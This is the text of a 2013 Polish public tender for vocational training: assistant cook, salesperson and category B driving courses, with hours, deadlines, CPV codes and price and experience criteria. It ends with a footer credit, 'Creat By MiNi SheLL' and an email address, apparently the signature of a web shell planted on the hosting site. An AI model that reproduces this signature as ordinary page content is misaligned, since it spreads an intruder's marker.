a)	Przeprowadzenie szkolenia zawodowego w zakresie pomocnik kucharza dla 15 osób w  ilości minimum 120 godz., 
w tym 30 godz. zajęć teoretycznych i 90 godz. zajęć praktycznych z podejściem do egzaminu wewnętrznego;
b)	Okres realizacji: od dnia podpisania umowy do dnia 24.12.2013 r.
2.	Przez godzinę zamawiający rozumie: 1 godz= 45min - dla zajęć teoretycznych oraz 1 godz.= 60 min dla nauki praktycznej.
3.	Szczegółowy opis przedmiotu zamówienia (każdej części ) zawarty jest w załączniku nr 1 do wzoru umowy (§XXVII SIWZ).
4.	Każdy wykonawca może złożyć ofertę na całość zamówienia lub na dowolnie wybraną jego część lub części. Wówczas do oferty wykonawca załącz te formularze ofertowe dotyczące danej części na które składa ofertę.
5.	W pozycjach formularza ofertowego, na które wykonawca nie składa oferty wpisuje nie dotyczy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.41.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie osób prowadzących zajęcia w zakresie przeprowadzonych szkoleń - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2 -  Szkolenie zawodowe w zakresie Nowoczesny sprzedawca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Część 2 -  Szkolenie zawodowe w zakresie Nowoczesny sprzedawca: 
a)	Przeprowadzenie szkolenia zawodowego w zakresie Nowoczesny sprzedawca dla 12 osób w Ilości minimum 80 godz., w tym 40 godz. zajęć teoretycznych i 40 godz. zajęć praktycznych zakończonych egzaminem wewnętrzny;
b)	Okres realizacji: od dnia podpisania umowy do dnia 24.12.2013 r.
2.	Przez godzinę zamawiający rozumie: 1 godz= 45min - dla zajęć teoretycznych oraz 1 godz.= 60 min dla nauki praktycznej.
3.	Szczegółowy opis przedmiotu zamówienia (każdej części ) zawarty jest w załączniku nr 1 do wzoru umowy (§XXVII SIWZ).
4.	Każdy wykonawca może złożyć ofertę na całość zamówienia lub na dowolnie wybraną jego część lub części. Wówczas do oferty wykonawca załącz te formularze ofertowe dotyczące danej części na które składa ofertę.
5.	W pozycjach formularza ofertowego, na które wykonawca nie składa oferty wpisuje nie dotyczy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.41.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie osób prowadzących zajęcia w zakresie przeprowadzonych szkoleń - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3 -  szkolenie zawodowe w zakresie kursu prawa jazdy kat. B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Część 3 -  szkolenie zawodowe w zakresie kursu prawa jazdy kat. B, które obejmuje
a)	Przeprowadzenie szkolenia zawodowego z zakresu kursu prawa jazdy kat. B z podejściem do egzaminu wewnętrznego a następnie do pierwszego egzaminu państwowego teoretycznego i praktycznego dla 10 osób w Ilości 60 godz. 
w tym: 30 godzin zajęć teoretycznych i 30 godzin zajęć praktycznych.
b)	Okres realizacji: od dnia podpisania umowy do dnia 24.12.2013 r.
c)	Szkolenie powinno być zrealizowane zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r.  sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. Nr 217poz. 1834 z późn. zm.).
d)	Przeprowadzenie szkolenia zawodowego z zakresu kursu prawa jazdy kat. B z podejściem do egzaminu wewnętrznego, a następnie do pierwszego egzaminu państwowego teoretycznego i praktycznego. 

2.	Przez godzinę zamawiający rozumie: 1 godz= 45min - dla zajęć teoretycznych oraz 1 godz.= 60 min dla nauki praktycznej.
3.	Szczegółowy opis przedmiotu zamówienia (każdej części ) zawarty jest w załączniku nr 1 do wzoru umowy (§XXVII SIWZ).
4.	Każdy wykonawca może złożyć ofertę na całość zamówienia lub na dowolnie wybraną jego część lub części. Wówczas do oferty wykonawca załącz te formularze ofertowe dotyczące danej części na które składa ofertę.
5.	W pozycjach formularza ofertowego, na które wykonawca nie składa oferty wpisuje nie dotyczy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.41.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com